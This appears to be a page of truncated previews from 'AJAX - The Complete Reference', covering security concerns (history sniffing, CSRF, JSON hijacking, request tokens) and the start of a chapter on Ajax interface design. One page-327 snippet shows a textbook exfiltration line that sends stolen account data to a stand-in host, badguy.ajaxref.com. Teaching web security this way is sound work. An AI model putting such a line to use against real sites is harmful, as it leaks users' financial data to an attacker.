AJAX - The Complete Reference
PART II Chapter 7: Security Concerns 321 Hackers would like to know what sites you have visited. As it turns out, if you visit t ...
322 Part II: Developing an Ajax Library^ Now by itself, this particular information spill does not have much effect, but remembe ...
PART II Chapter 7: Security Concerns 323 the AjaxBank, you do not invalidate the cookie by pressing some logout button nor close ...
324 Part II: Developing an Ajax Library^ they use CSRF to have the user make requests at Google like so http://www.google.com/ s ...
PART II Chapter 7: Security Concerns 325 This might not seem so bad since the JSON array is just a literal and the intruder woul ...
326 Part II: Developing an Ajax Library^ it would at least (at the point of this writing) have been safe. However, if for some r ...
PART II Chapter 7: Security Concerns 327 var url = "http://badguy.ajaxref.com/ch7/saveaccounts.php?accounts=" + data; var scr = ...
328 Part II: Developing an Ajax Library^ badguy.ajaxref.com. A referrer check could be added to address this at the bank site an ...
PART II Chapter 7: Security Concerns 329 Later on, when the request is made, the header is added with the passed value: /* Set s ...
330 Part II: Developing an Ajax Library^ calculated for the data. If the values don’t match, the user is alerted to the possibil ...
PART II Chapter 7: Security Concerns 331 secret to the end user where it could be discovered. While this approach certainly is f ...
332 Part II: Developing an Ajax Library^ If you want to fetch information from another site or even mash-up content from a numbe ...
PART II Chapter 7: Security Concerns 333 Now, this is all fine, but as you have seen, no site that content is fetched from shoul ...
334 Part II: Developing an Ajax Library Summary There is no such thing as absolute security. Ultimately, all locks can be broken ...
8 User Interface Design for Ajax E nd users are generally oblivious of the technical and network plumbing changes Ajax introduce ...
336 Part II: Developing an Ajax Library^ Ajax applications often appear faster because of the reduction in size of data transmis ...
PART II Chapter 8: User Interface Design for Ajax 337 users are not aware of changes. Put simply, if incremental changes to page ...
338 Part II: Developing an Ajax Library^ pulse a logo both in the upper corner of the window and on a tab, set status bar messag ...
PART II Chapter 8: User Interface Design for Ajax 339 FIGURE 8-2 Loading screens can be found in some traditional Web applicatio ...
340 Part II: Developing an Ajax Library^ Ajax Application’s Activity Indicators In the case of an Ajax application, the develope ...
«
13
14
15
16
17
18
19
20
21
22
»
Free download pdf